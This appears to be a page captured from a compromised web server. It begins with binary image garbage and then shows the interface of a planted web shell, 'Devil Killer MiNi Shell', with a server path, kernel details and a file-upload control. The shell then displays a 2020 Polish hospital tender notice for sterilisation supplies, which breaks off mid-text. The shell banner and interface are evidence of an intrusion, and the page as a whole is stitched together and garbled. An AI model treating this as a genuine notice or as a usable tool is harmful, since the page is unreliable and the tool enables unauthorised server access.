JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20200306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20200306/521132-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 521132-N-2020 z dnia 2020-03-06 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Samodzielny Publiczny ZOZ</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa produktów medycznych sterylizacyjnych - 5 pakiety.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"> </span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Samodzielny Publiczny ZOZ</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">00030450400000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Grunwaldzka</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">4</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">36-100</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Kolbuszowa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">podkarpackie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">0172271222</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">walenty.plis@szpital.kolbuszowa.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">0172271233</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.szpital.kolbuszowa.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej">www.szpital.kolbuszowa.pl</span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Podmiot prawa publicznego</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.szpital.kolbuszowa.pl zakładka przetargi</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.szpital.kolbuszowa.pl zakadka przetargi</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Pisemnie na adres wskazany poniżej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Samodzielny Publiczny Zespół Opieki Zdrowotnej w Kolbuszowej Grunwaldzka 4 36-100 Kolbuszowa Polska</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa produktów medycznych sterylizacyjnych - 5 pakiety.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">Eap-2412/5/2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Dostawa produktów medycznych sterylizacyjnych - 5 pakietów dla Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Kolbuszowej.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">33100000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt. 6 uPzp, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, o wartości do 10 % wartości zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu dostaw podobnych do przedmiotu niniejszego zamówienia.;</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Dodatkowe wymagania Zamawiającego:Zaoferowany przedmiot zamówienia musi posiadać:a)	deklarację zgodności CE lub oświadczenie, że nie jest ono wymagane;b)	świadectwo dopuszczenia do obrotu i używania na terenie RP, zgodnie z obowiązującymi przepisami prawa w tym zakresie.Wymagania szczegółowe związane z przedmiotem zamówienia.1)	Zaoferowana cena zawiera wszystkie koszty związane z realizacją umowy, w tym w szczególności wartość przedmiotów umowy wraz z opakowaniami, kosztami transportu w tym zabezpieczenia, ubezpieczenia, wszelkich innych należności i opłat.2)	W przypadku okresowego braku produkcji oferowanego materiału (okresowy brak na rynku) należy wycenić tę pozycję wg ostatniej ceny sprzedaży oraz nanieść informację o jej tymczasowym braku na rynku. 3)	Braki w dostawach materiałów objętych przetargiem spowodowane okresowym brakiem produkcji będą obowiązkowo niezwłocznie zgłaszane przez Wykonawcę pisemnie lub tel. / 017 581 99 14 - Sterylizacja4)	Zamawiający zastrzega sobie prawo do rezygnacji z niektórych pozycji wymienionych w ofercie przetargowej lub do zakupu mniejszej ilości niż wskazana w SIWZ.5)	Przedstawiona oferta nie może stanowić zbiorczych cenników, lecz winna zostać sporządzona wyłącznie z ukierunkowaniem na prowadzone postępowanie i odpowiadać wymogom Zamawiającego określonym w niniejszej Specyfikacji Istotnych Warunków Zamówienia.6)	Zamawiający zastrzega sobie możliwość składania zamówień/ zleceń bez jakichkolwiek ograniczeń co do ilości, składu, częstotliwości, wartości poszczególnych dostaw.7)	Zamówienie będzie realizowane sukcesywnie w zależności od potrzeb Zamawiającego do całkowitego wyczerpania zakresu przedmiotowego zamówienia .8)	Asortyment musi być dostarczony i wniesiony przez Wykonawcę do pomieszczenia magazynowego wskazanego przez Zamawiającego w dniu dostawy.9)	Napisy i etykiety i opakowania jednostkowego muszą być w języku polskim.10)	Dostarczane przedmioty umowy winne posiadać okres przydatności do użycia wynoszący co najmniej 24 miesięcy od daty odbioru dostawy bez zastrzeżeń ( z wyjątkiem pozycji asortymentowej nr 2 w Pakiecie nr 1 oraz pozycji nr 1 w Pakiecie nr 2, gdzie wymagany okres przydatności do użycia wynosi min. 12 miesięcy).Uwaga:1)Podane w uszczegółowieniu nazwy własne produktów, procesów lub technologii mają tylko charakter informacyjny w celu określenia jakości standardu wykonania i nie naruszają zasad uczciwej konkurencji (zgodnie z art. 29 pkt. 3 Ustawy Prawo zamówień publicznych).Produkty równoważne muszą być zgodne z opisem zamówienia i muszą odpowiadać wszystkim parametrom technicznych, wielkością oraz funkcjonalnością określonymi w standardzie wykonania.2)Zamawiający zastrzega sobie możliwość wezwania Wykonawcy do złożenia nieodpłatnych próbek każdej pozycji asortymentu we wszystkich Pakietach, w terminie przez siebie wskazanym w przypadku braku możliwości prawidłowej oceny warunków technicznych oferowanego asortymentu z dołączonych do oferty katalogów, badań producenta, broszur, prospektów, kart technicznych potwierdzonych przez Wykonawcę (np. nieczytelny lub niepełny opis asortymentu, brak zaznaczenia pozycji w katalogu zbiorczym).</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Katalogi, broszury, prospekty, karty techniczne z zaznaczonymi pozycjami asortymentu wykazanego w załączniku nr 2 do SIWZ (uszczegółowienie przedmiotu zamówienia), których autentyczność potwierdza Wykonawca.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono 